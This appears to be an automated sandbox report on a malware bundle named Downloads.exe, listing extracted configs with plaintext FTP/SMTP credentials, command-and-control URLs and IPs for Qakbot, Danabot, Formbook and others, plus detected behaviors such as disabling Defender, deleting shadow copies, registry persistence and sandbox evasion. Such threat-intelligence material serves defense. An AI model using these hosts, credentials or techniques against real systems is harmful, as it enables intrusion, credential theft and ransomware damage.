Downloads.exe

General
Target

Downloads.exe

Filesize

141MB

Completed

19-11-2020 17:48

Score
10 /10
MD5

07917bc6f34323a498bbbf68eb446724

SHA1

6f192776575fe4087684d24a0a5fb07e5a1c76ed

SHA256

a6942a7cce17a9de2ff1679f685796468698f06a45f6e4e97b9ff5027ef35a86

Malware Config

Extracted

Credentials

Protocol: ftp

Host: 45.141.184.35

Port: 21

Username: alex

Password: easypassword

Extracted

Credentials

Protocol: smtp

Host: mail.pro-powersourcing.com

Port: 587

Username: vivi@pro-powersourcing.com

Password: china1977

Extracted

Family azorult
C2

http://kvaka.li/1210776429.php

Extracted

Family formbook
Version 4.0
C2

http://www.worstig.com/w9z/

Decoy

crazzysex.com

hanferd.com

gteesrd.com

bayfrontbabyplace.com

jicuiquan.net

relationshiplink.net

ohchacyberphoto.com

kauegimenes.com

powerful-seldom.com

ketotoken.com

make-money-online-success.com

redgoldcollection.com

hannan-football.com

hamptondc.com

vllii.com

aa8520.com

platform35markethall.com

larozeimmo.com

oligopoly.net

llhak.info

fisioservice.com

tesla-magnumopus.com

cocodrilodigital.com

pinegrovesg.com

traveladventureswithme.com

hebitaixin.com

golphysi.com

gayjeans.com

quickhire.expert

randomviews1.com

eatatnobu.com

topmabati.com

mediaupside.com

spillerakademi.com

thebowtie.store

sensomaticloadcell.com

turismodemadrid.net

yuhe89.com

wernerkrug.com

cdpogo.net

dannynhois.com

realestatestructureddata.com

matewhereareyou.net

laimeibei.ltd

sw328.com

lmwworks.net

xtremefish.com

tonerias.com

dsooneclinicianexpert.com

281clara.com

Extracted

Family gozi_rm3
Botnet 86920224
C2

https://sibelikinciel.xyz

Attributes
build
300869
exe_type
loader
server_id
12
url_path
index.htm
rsa_pubkey.plain
serpent.plain

Extracted

Family formbook
Version 4.1
C2

http://www.joomlas123.com/i0qi/

http://www.norjax.com/app/

Decoy

mytakeawaybox.com

goutaihuo.com

kuzey.site

uppertenpiercings.amsterdam

honeygrandpa.com

jenniferabramslaw.com

ncarian.com

heavilymeditatedhouston.com

gsbjyzx.com

akisanblog.com

taoyuanreed.com

jasperrvservices.com

yabbanet.com

myhealthfuldiet.com

flipdigitalcoins.com

toes.photos

shoottillyoumiss.com

maserental.com

smarteacher.net

hamdimagdeco.com

wuxifanggang.com

alamediationtraining.com

vfoe.team

kms-sp.com

gfidevfight.net

anomadbackpacker.com

21oms.us

australianseniorpreneur.com

valuereceipt.com

superbetbahis.com

rsrgoup.com

hoidonghuongkimson.com

parmedpharma.com

discoveryoverload.com

livetv247.win

jepekha.com

6o5ttvst.biz

netcorrespondents.com

cscycorp.com

emonkeygraphics.com

tillyaeva-lola.news

dgx9.com

jiucai5.com

justwoodsouthern.com

dentalexpertstraining.com

amazoncarpet.com

xsxnet.net

androidaso.com

jinhucai.com

wellnessitaly.store

Extracted

Family danabot
C2

92.204.160.54

2.56.213.179

45.153.186.47

93.115.21.29

185.45.193.50

193.34.166.247

rsa_pubkey.plain

Extracted

Family qakbot
Botnet spx129
Campaign 1590734339
C2

94.10.81.239:443

94.52.160.116:443

67.0.74.119:443

175.137.136.79:443

73.232.165.200:995

79.119.67.149:443

62.38.111.70:2222

108.58.9.238:993

216.110.249.252:2222

67.209.195.198:3389

84.247.55.190:443

96.37.137.42:443

94.176.220.76:2222

173.245.152.231:443

96.227.122.123:443

188.192.75.8:995

24.229.245.124:995

71.163.225.75:443

75.71.77.59:443

104.36.135.227:443

173.173.77.164:443

207.255.161.8:2222

68.39.177.147:995

178.193.33.121:2222

72.209.191.27:443

67.165.206.193:995

64.19.74.29:995

117.199.195.112:443

75.87.161.32:995

188.173.214.88:443

173.22.120.11:2222

96.41.93.96:443

86.125.210.26:443

24.10.42.174:443

47.201.1.210:443

69.92.54.95:995

24.202.42.48:2222

47.205.231.60:443

66.26.160.37:443

65.131.44.40:995

24.110.96.149:443

108.58.9.238:443

77.159.149.74:443

74.56.167.31:443

75.137.239.211:443

47.153.115.154:995

173.172.205.216:443

184.98.104.7:995

24.46.40.189:2222

98.115.138.61:443

Signatures 102

Filter: none

Collection
Credential Access
Defense Evasion
Discovery
Execution
Impact
Persistence
  • AgentTesla

    Description

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Azorult

    Description

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • CoreEntity .NET Packer

    Description

    A .NET packer called CoreEntity where it has embedded the payload as a BitMap object which is later decrypted.

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral2/memory/2180-672-0x00000000006E0000-0x00000000006E2000-memory.dmpcoreentity
  • Danabot

    Description

    Danabot is a modular banking Trojan that has been linked with other malware.

  • Danabot x86 payload

    Description

    Detection of Danabot x86 payload, mapped in memory during the execution of its loader.

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral2/files/0x0003000000010af1-649.datfamily_danabot
    behavioral2/files/0x0003000000010af1-648.datfamily_danabot
    behavioral2/files/0x0003000000010af1-712.datfamily_danabot
    behavioral2/files/0x00030000000135f3-724.datfamily_danabot
    behavioral2/files/0x00030000000135f3-729.datfamily_danabot
    behavioral2/files/0x00030000000135f3-728.datfamily_danabot
    behavioral2/files/0x00030000000135f3-727.datfamily_danabot
    behavioral2/files/0x00030000000135f3-726.datfamily_danabot
    behavioral2/files/0x00030000000135f3-711.datfamily_danabot
    behavioral2/files/0x0003000000010af1-717.datfamily_danabot
    behavioral2/files/0x0003000000010af1-716.datfamily_danabot
    behavioral2/files/0x0003000000010af1-715.datfamily_danabot
  • Dharma

    Description

    Dharma is a ransomware that uses security software installation to hide malicious activities.

  • Formbook

    Description

    Formbook is a data stealing malware which is capable of stealing data.

  • Gozi RM3

    Description

    A heavily modified version of Gozi using RM3 loader.

  • Guloader,Cloudeye

    Description

    A shellcode based downloader first seen in 2020.

  • Modifies Windows Defender Real-time Protection settings

    TTPs

    Modify RegistryModify Existing ServiceDisabling Security Tools
  • Modifies visiblity of hidden/system files in Explorer

    Tags

    TTPs

    Hidden Files and DirectoriesModify Registry
  • PlugX

    Description

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Pony,Fareit

    Description

    Pony is a Remote Access Trojan application that steals information.

  • Qakbot/Qbot

    Description

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

  • RMS

    Description

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • RedLine

    Description

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload

    Reported IOCs

    resourceyara_rule
    behavioral2/files/0x000300000001390d-937.datfamily_redline
    behavioral2/files/0x000300000001390d-969.datfamily_redline
    behavioral2/files/0x000300000001390d-927.datfamily_redline
  • WarzoneRat, AveMaria

    Description

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass

    TTPs

    Disabling Security ToolsModify Registry
  • ACProtect 1.3x - 1.4x DLL software

    Description

    Detects file using ACProtect software.

    Reported IOCs

    resourceyara_rule
    behavioral2/files/0x000300000001318d-127.datacprotect
    behavioral2/files/0x000300000001318c-126.datacprotect
  • AgentTesla Payload

    Reported IOCs

    resourceyara_rule
    behavioral2/files/0x000300000001323d-365.datfamily_agenttesla
    behavioral2/files/0x000300000001323d-369.datfamily_agenttesla
    behavioral2/memory/1552-734-0x000000000044C82E-mapping.dmpfamily_agenttesla
    behavioral2/memory/1552-738-0x0000000000400000-0x0000000000452000-memory.dmpfamily_agenttesla
    behavioral2/memory/1552-736-0x0000000000400000-0x0000000000452000-memory.dmpfamily_agenttesla
    behavioral2/memory/1552-733-0x0000000000400000-0x0000000000452000-memory.dmpfamily_agenttesla
    behavioral2/memory/4700-917-0x000000000044CCFE-mapping.dmpfamily_agenttesla
    behavioral2/files/0x000300000001323d-923.datfamily_agenttesla
    behavioral2/files/0x000300000001323d-922.datfamily_agenttesla
    behavioral2/files/0x000200000001147d-947.datfamily_agenttesla
    behavioral2/memory/4700-956-0x0000000000400000-0x0000000000452000-memory.dmpfamily_agenttesla
    behavioral2/memory/4948-1074-0x000000000044CB3E-mapping.dmpfamily_agenttesla
    behavioral2/memory/4948-1073-0x0000000000400000-0x0000000000452000-memory.dmpfamily_agenttesla
    behavioral2/memory/4948-1076-0x0000000000400000-0x0000000000452000-memory.dmpfamily_agenttesla
    behavioral2/files/0x000200000001147d-990.datfamily_agenttesla
    behavioral2/memory/4700-954-0x0000000000400000-0x0000000000452000-memory.dmpfamily_agenttesla
    behavioral2/files/0x000200000001147d-941.datfamily_agenttesla
    behavioral2/memory/4700-911-0x0000000000400000-0x0000000000452000-memory.dmpfamily_agenttesla
    behavioral2/memory/4580-1123-0x0000000000400000-0x0000000000450000-memory.dmpfamily_agenttesla
    behavioral2/memory/4580-1124-0x000000000044A49E-mapping.dmpfamily_agenttesla
    behavioral2/memory/4580-1126-0x0000000000400000-0x0000000000450000-memory.dmpfamily_agenttesla
    behavioral2/memory/3704-1136-0x0000000000090000-0x00000000000E2000-memory.dmpfamily_agenttesla
    behavioral2/memory/3704-1134-0x0000000000090000-0x00000000000E2000-memory.dmpfamily_agenttesla
    behavioral2/memory/3704-1129-0x000000000044CF8E-mapping.dmpfamily_agenttesla
    behavioral2/memory/4580-1127-0x0000000000400000-0x0000000000450000-memory.dmpfamily_agenttesla
  • CryptOne packer

    Description

    Detects CryptOne packer defined in NCC blogpost.

    Reported IOCs

    resourceyara_rule
    behavioral2/files/0x000300000001323b-336.datcryptone
    behavioral2/files/0x000300000001323b-351.datcryptone
    behavioral2/files/0x0003000000013252-542.datcryptone
    behavioral2/files/0x0003000000013252-549.datcryptone
    behavioral2/files/0x0003000000013252-682.datcryptone
    behavioral2/files/0x000300000001383f-883.datcryptone
    behavioral2/files/0x000300000001383f-891.datcryptone
    behavioral2/files/0x0003000000013252-1036.datcryptone
    behavioral2/files/0x0003000000013252-1035.datcryptone
    behavioral2/files/0x000300000001383f-1088.datcryptone
    behavioral2/files/0x000300000001383f-1090.datcryptone
    behavioral2/files/0x0003000000013252-1098.datcryptone
    behavioral2/files/0x0003000000013252-1097.datcryptone
    behavioral2/files/0x000300000001383f-884.datcryptone
    behavioral2/files/0x000300000001383f-1856.datcryptone
  • Deletes shadow copies

    Description

    Ransomware often targets backup files to inhibit system recovery.

    Tags

    TTPs

    File DeletionInhibit System Recovery
  • Formbook Payload

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral2/memory/2148-318-0x0000000000400000-0x000000000042D000-memory.dmpformbook
    behavioral2/memory/2148-324-0x000000000041E2D0-mapping.dmpformbook
    behavioral2/memory/2428-379-0x0000000000000000-mapping.dmpformbook
    behavioral2/memory/3636-591-0x0000000000000000-mapping.dmpformbook
    behavioral2/memory/2768-1082-0x0000000000000000-mapping.dmpformbook
    behavioral2/memory/2828-1128-0x0000000000400000-0x000000000042D000-memory.dmpformbook
    behavioral2/memory/2828-1131-0x000000000041E270-mapping.dmpformbook
    behavioral2/memory/4560-1165-0x0000000000000000-mapping.dmpformbook
    behavioral2/memory/1568-1168-0x000000000041E2D0-mapping.dmpformbook
    behavioral2/memory/4976-1253-0x0000000000000000-mapping.dmpformbook
    behavioral2/memory/4032-1285-0x000000000041E2D0-mapping.dmpformbook
    behavioral2/memory/3692-1312-0x0000000000000000-mapping.dmpformbook
    behavioral2/memory/2412-1392-0x000000000041E2D0-mapping.dmpformbook
    behavioral2/memory/3580-1565-0x000000000041E2D0-mapping.dmpformbook
    behavioral2/memory/4424-1599-0x000000000041E2D0-mapping.dmpformbook
    behavioral2/memory/2428-1610-0x00000000030F0000-0x00000000031FA000-memory.dmpformbook
    behavioral2/memory/4436-1611-0x0000000000000048-mapping.dmpformbook
    behavioral2/memory/4616-1621-0x000000000041E270-mapping.dmpformbook
    behavioral2/memory/2428-1623-0x00000000030F0000-0x00000000031FA000-memory.dmpformbook
    behavioral2/memory/2568-1624-0x000000000000004C-mapping.dmpformbook
    behavioral2/memory/5612-1625-0x0000000000000000-mapping.dmpformbook
  • Grants admin privileges

    Description

    Uses net.exe to modify the user's privileges.

    TTPs

    Account Manipulation
  • Guloader Payload

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral2/memory/4436-1611-0x0000000000000048-mapping.dmpfamily_guloader
    behavioral2/memory/2568-1624-0x000000000000004C-mapping.dmpfamily_guloader
  • Looks for VirtualBox Guest Additions in registry

    Tags

    TTPs

    Query RegistryVirtualization/Sandbox Evasion
  • Nirsoft

    Reported IOCs

    resourceyara_rule
    behavioral2/files/0x0003000000013941-1014.datNirsoft
    behavioral2/files/0x0003000000013941-1027.datNirsoft
    behavioral2/files/0x0003000000013941-1020.datNirsoft
    behavioral2/files/0x0003000000013941-1013.datNirsoft
  • ReZer0 packer

    Description

    Detects ReZer0, a packer with multiple versions used in various campaigns.

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral2/memory/2180-679-0x0000000004F70000-0x0000000004FC3000-memory.dmprezer0
    behavioral2/memory/3956-685-0x0000000004C10000-0x0000000004C61000-memory.dmprezer0
    behavioral2/memory/3832-704-0x0000000004C80000-0x0000000004CD3000-memory.dmprezer0
    behavioral2/memory/3396-779-0x00000000009D0000-0x00000000009D9000-memory.dmprezer0
  • ASPack v2.12-2.42

    Description

    Detects executables packed with ASPack v2.12-2.42

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral2/files/0x000300000001318a-73.dataspack_v212_v242
    behavioral2/files/0x000300000001318a-71.dataspack_v212_v242
    behavioral2/files/0x000300000001318a-70.dataspack_v212_v242
    behavioral2/files/0x000300000001318a-108.dataspack_v212_v242
    behavioral2/files/0x000300000001318a-117.dataspack_v212_v242
    behavioral2/files/0x000300000001318a-119.dataspack_v212_v242
    behavioral2/files/0x000300000001318a-803.dataspack_v212_v242
    behavioral2/files/0x000300000001318a-802.dataspack_v212_v242
  • Adds policy Run key to start application
    cmmon32.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Runcmmon32.exe
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VJLHZLDXN = "C:\\Program Files (x86)\\Lgzhxwx\\IconCachenb6h.exe"cmmon32.exe
  • Blocklisted process makes network request
    rundll32.exerundll32.exerundll32.exe

    Reported IOCs

    flowpidprocess
    633284rundll32.exe
    693596rundll32.exe
    703596rundll32.exe
    713800rundll32.exe
    783596rundll32.exe
    793800rundll32.exe
    893596rundll32.exe
    903800rundll32.exe
    943800rundll32.exe
    953800rundll32.exe
    1133596rundll32.exe
    1173800rundll32.exe
    1263596rundll32.exe
    1273800rundll32.exe
    1303596rundll32.exe
    1333800rundll32.exe
    1493596rundll32.exe
    1513596rundll32.exe
    1573800rundll32.exe
    1673596rundll32.exe
    1713800rundll32.exe
    5063596rundll32.exe
    5073596rundll32.exe
    5083596rundll32.exe
    5093596rundll32.exe
    5123800rundll32.exe
    5163596rundll32.exe
    5413800rundll32.exe
    5443596rundll32.exe
    5673800rundll32.exe
    5713596rundll32.exe
    5823800rundll32.exe
    5853596rundll32.exe
    6003800rundll32.exe
    6013596rundll32.exe
    6023800rundll32.exe
    6033800rundll32.exe
    6043800rundll32.exe
    6053800rundll32.exe
    6083800rundll32.exe
    6103800rundll32.exe
    6233596rundll32.exe
    6273800rundll32.exe
    6383596rundll32.exe
    6393800rundll32.exe
    6473596rundll32.exe
    6493800rundll32.exe
    6563596rundll32.exe
    6603800rundll32.exe
    6703596rundll32.exe
    6753800rundll32.exe
    6873596rundll32.exe
    6893800rundll32.exe
    7293596rundll32.exe
    7323800rundll32.exe
    7353596rundll32.exe
    7383596rundll32.exe
    7393800rundll32.exe
    7433596rundll32.exe
    7493800rundll32.exe
    7503596rundll32.exe
    7703800rundll32.exe
    7753800rundll32.exe
    7993596rundll32.exe
  • Blocks application from running via registry modification

    Description

    Adds application to list of disallowed applications.

    Tags

  • Disables Task Manager via registry modification

    Tags

  • Drops file in Drivers directory
    MSBuild.execmd.exeupdate.exe24.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\system32\drivers\etc\hostsMSBuild.exe
    File opened for modificationC:\Windows\System32\drivers\etc\hostscmd.exe
    File opened for modificationC:\Windows\System32\drivers\etc\hostsupdate.exe
    File opened for modificationC:\Windows\system32\drivers\etc\hosts24.exe
  • Executes dropped EXE
    update.exeTreasure.Vault.3D.Screensaver.keygen.by.Paradox.exeRemouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exewini.exewinit.exeintro.exekeygen-pr.exekeygen-step-1.execheat.exekeygen-step-4.exerutserv.exekey.exe002.exekey.exetaskhost.exerutserv.exerutserv.exerutserv.exeMagic_File_v3_keygen_by_KeygenNinja.exeintro.exekeygen-pr.exekeygen-step-1.exekeygen-step-3.exekeygen-step-4.exe002.exekey.exekey.exeLtHv0O2KZDK4M637.exekeygen-pr.exekeygen-step-3.exekeygen-step-4.exeapi.exe31.exeSetup.exeSetup.exe3DMark 11 Advanced Edition.exe2.exe3.exe4.exe2.exe5.exekey.exe6.exeSetup.exe7.exe8.exe9.exe10.exe11.exe12.exe13.exe14.exekey.exe15.exe16.exe17.exe18.exe19.exesetup.exesetup.exe20.exe21.exe22.exe23.exe

    Reported IOCs

    pidprocess
    1748update.exe
    1116Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
    1248Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
    876wini.exe
    1632winit.exe
    996intro.exe
    1320keygen-pr.exe
    1604keygen-step-1.exe
    1764cheat.exe
    316keygen-step-4.exe
    1516rutserv.exe
    1236key.exe
    1940002.exe
    620key.exe
    1760taskhost.exe
    1600rutserv.exe
    2180rutserv.exe
    2280rutserv.exe
    2356Magic_File_v3_keygen_by_KeygenNinja.exe
    2552intro.exe
    2580keygen-pr.exe
    2688keygen-step-1.exe
    2756keygen-step-3.exe
    2804keygen-step-4.exe
    3060002.exe
    1416key.exe
    2624key.exe
    1732LtHv0O2KZDK4M637.exe
    2696keygen-pr.exe
    2876keygen-step-3.exe
    2964keygen-step-4.exe
    2308api.exe
    303631.exe
    2604Setup.exe
    436Setup.exe
    4883DMark 11 Advanced Edition.exe
    10762.exe
    26323.exe
    27444.exe
    21482.exe
    25885.exe
    2652key.exe
    17766.exe
    1288Setup.exe
    19007.exe
    23528.exe
    21809.exe
    207610.exe
    184411.exe
    212412.exe
    160413.exe
    264814.exe
    3024key.exe
    194415.exe
    81616.exe
    201217.exe
    306818.exe
    300819.exe
    3304setup.exe
    3264setup.exe
    313620.exe
    338421.exe
    355222.exe
    374423.exe
  • Looks for VMWare Tools registry key

    Tags

    TTPs

    Query RegistryVirtualization/Sandbox Evasion
  • Modifies Windows Firewall

    Tags

    TTPs

    Modify Existing Service
  • Modifies extensions of user files
    16.exe

    Description

    Ransomware generally changes the extension on encrypted files.

    Tags

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Users\Admin\Pictures\ReceiveEnter.tiff16.exe
  • Sets DLL path for service in the registry

    TTPs

    Registry Run Keys / Startup FolderModify Registry
  • Sets file to hidden

    Description

    Modifies file attributes to stop it showing in Explorer etc.

    Tags

    TTPs

    Hidden Files and Directories
  • Stops running service(s)

    Tags

    TTPs

    Modify Existing ServiceService Stop
  • Suspicious Office macro

    Description

    Office document equipped with 4.0 macros.

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral2/files/0x00030000000136bd-764.datoffice_xlm_macros
  • UPX packed file

    Description

    Detects executables packed with UPX/modified UPX open source packer.

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral2/files/0x000300000001318d-127.datupx
    behavioral2/files/0x000300000001318c-126.datupx
    behavioral2/files/0x0003000000013226-840.datupx
    behavioral2/files/0x0003000000013226-823.datupx
    behavioral2/files/0x0003000000013226-825.datupx
    behavioral2/files/0x0003000000013226-824.datupx
    behavioral2/files/0x00030000000136af-850.datupx
    behavioral2/files/0x00030000000136af-845.datupx
    behavioral2/files/0x00030000000136af-903.datupx
    behavioral2/files/0x000300000001391a-938.datupx
    behavioral2/files/0x000300000001391a-1009.datupx
    behavioral2/files/0x0003000000013226-1012.datupx
    behavioral2/files/0x0003000000013941-966.datupx
    behavioral2/files/0x0003000000013941-960.datupx
    behavioral2/files/0x0003000000013941-959.datupx
    behavioral2/files/0x000300000001391a-935.datupx
    behavioral2/files/0x0003000000013103-1401.datupx
    behavioral2/files/0x000a00000001323b-1595.datupx
    behavioral2/files/0x000a00000001323b-1607.datupx
  • Checks BIOS information in registry
    11.exeregsvcojoduf-.exe

    Description

    BIOS information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion11.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion11.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersionregsvcojoduf-.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersionregsvcojoduf-.exe
  • Checks QEMU agent file
    RegAsm.exe3.exe23.exe28.exe7.exe3.exe15.exe13.exe19.exe19.exe25.exe31.exeStyltendeschris.exeStyltendeschris.exe13.exe20.exe

    Description

    Checks presence of QEMU agent, possibly to detect virtualization.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exeRegAsm.exe
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exe3.exe
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exe23.exe
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exe28.exe
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exe7.exe
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exe3.exe
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exe15.exe
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exe13.exe
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exe19.exe
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exe19.exe
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exe25.exe
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exe31.exe
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exeStyltendeschris.exe
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exeStyltendeschris.exe
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exe13.exe
    File opened (read-only)C:\Program Files\Qemu-ga\qemu-ga.exe20.exe
  • Drops startup file
    16.exe30.exe

    Reported IOCs

    descriptioniocprocess
    File createdC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\16.exe16.exe
    File opened for modificationC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PickerHost.url30.exe
    File opened for modificationC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini16.exe
    File createdC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta16.exe
  • Loads dropped DLL
    update.exewini.execmd.execmd.exekeygen-pr.exekeygen-step-4.execheat.exekey.execmd.exekeygen-step-4.exekeygen-pr.exekey.execmd.exekeygen-pr.exekeygen-step-4.exeSetup.exeSetup.exeSetup.exe

    Reported IOCs

    pidprocess
    1748update.exe
    876wini.exe
    876wini.exe
    876wini.exe
    876wini.exe
    240cmd.exe
    240cmd.exe
    240cmd.exe
    240cmd.exe
    1748update.exe
    240cmd.exe
    440cmd.exe
    1320keygen-pr.exe
    1320keygen-pr.exe
    1320keygen-pr.exe
    1320keygen-pr.exe
    316keygen-step-4.exe
    316keygen-step-4.exe
    316keygen-step-4.exe
    316keygen-step-4.exe
    316keygen-step-4.exe
    1764cheat.exe
    1764cheat.exe
    1764cheat.exe
    1764cheat.exe
    1236key.exe
    2328cmd.exe
    2328cmd.exe
    2328cmd.exe
    2328cmd.exe
    2328cmd.exe
    2328cmd.exe
    2804keygen-step-4.exe
    2804keygen-step-4.exe
    2804keygen-step-4.exe
    2804keygen-step-4.exe
    2580keygen-pr.exe
    2580keygen-pr.exe
    2580keygen-pr.exe
    2580keygen-pr.exe
    1416key.exe
    2144cmd.exe
    2144cmd.exe
    316keygen-step-4.exe
    2144cmd.exe
    2804keygen-step-4.exe
    2696keygen-pr.exe
    2696keygen-pr.exe
    316keygen-step-4.exe
    316keygen-step-4.exe
    316keygen-step-4.exe
    2964keygen-step-4.exe
    2804keygen-step-4.exe
    2804keygen-step-4.exe
    2804keygen-step-4.exe
    2696keygen-pr.exe
    2696keygen-pr.exe
    2964keygen-step-4.exe
    2964keygen-step-4.exe
    2964keygen-step-4.exe
    436Setup.exe
    2604Setup.exe
    1288Setup.exe
    1288Setup.exe
  • Modifies file permissions
    icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

    Tags

    TTPs

    File Permissions Modification

    Reported IOCs

    pidprocess
    844icacls.exe
    2592icacls.exe
    2112icacls.exe
    3480icacls.exe
    1236icacls.exe
    3040icacls.exe
    1376icacls.exe
    2576icacls.exe
    2044icacls.exe
    2588icacls.exe
    2156icacls.exe
    3028icacls.exe
    552icacls.exe
    2988icacls.exe
    2072icacls.exe
    2836icacls.exe
    3488icacls.exe
    1720icacls.exe
    3880icacls.exe
    1920icacls.exe
    2836icacls.exe
    2328icacls.exe
    2112icacls.exe
    3424icacls.exe
    3704icacls.exe
    3296icacls.exe
    2844icacls.exe
    3540icacls.exe
    3464icacls.exe
    1068icacls.exe
    1636icacls.exe
    3640icacls.exe
    1944icacls.exe
    3016icacls.exe
    1844icacls.exe
    3648icacls.exe
    1880icacls.exe
    564icacls.exe
    1772icacls.exe
    1752icacls.exe
    2944icacls.exe
    1476icacls.exe
    2944icacls.exe
    3520icacls.exe
    3756icacls.exe
    4060icacls.exe
    3616icacls.exe
    3236icacls.exe
    3724icacls.exe
    2988icacls.exe
    2532icacls.exe
    3716icacls.exe
    2672icacls.exe
    3652icacls.exe
    4080icacls.exe
    3456icacls.exe
  • Obfuscated with Agile.Net obfuscator

    Description

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral2/memory/2352-484-0x00000000002C0000-0x00000000002CF000-memory.dmpagile_net
  • Reads data files stored by FTP clients

    Description

    Tries to access configuration files associated with programs like FileZilla.

    TTPs

    Data from Local SystemCredentials in Files
  • Reads local data of messenger clients

    Description

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

    TTPs

    Data from Local SystemCredentials in Files
  • Reads user/profile data of local email clients

    Description

    Email clients store some user data on disk where infostealers will often target it.

    TTPs

    Data from Local SystemCredentials in Files
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials etc.

    TTPs

    Data from Local SystemCredentials in Files
  • Uses the VBS compiler for execution

    TTPs

    Scripting
  • Accesses cryptocurrency files/wallets, possible credential harvesting

    Tags

    TTPs

    Data from Local SystemCredentials in Files
  • Adds Run key to start application
    13.exemstsc.exeStyltendeschris.execmmon32.exe16.exetaskhostw.exeRegAsm.exe3.exejuppp.exereg.exehmwmcj.exeMSBuild.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\PANOREREDEOPTIM = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Trainbandanigon6\\Styltendeschris.vbs"13.exe
    Key created\Registry\Machine\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Runmstsc.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnceStyltendeschris.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\PANOREREDEOPTIM = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Trainbandanigon6\\Styltendeschris.vbs"Styltendeschris.exe
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\8PB8S29 = "C:\\Program Files (x86)\\Zif6hz\\regsvcojoduf-.exe"cmmon32.exe
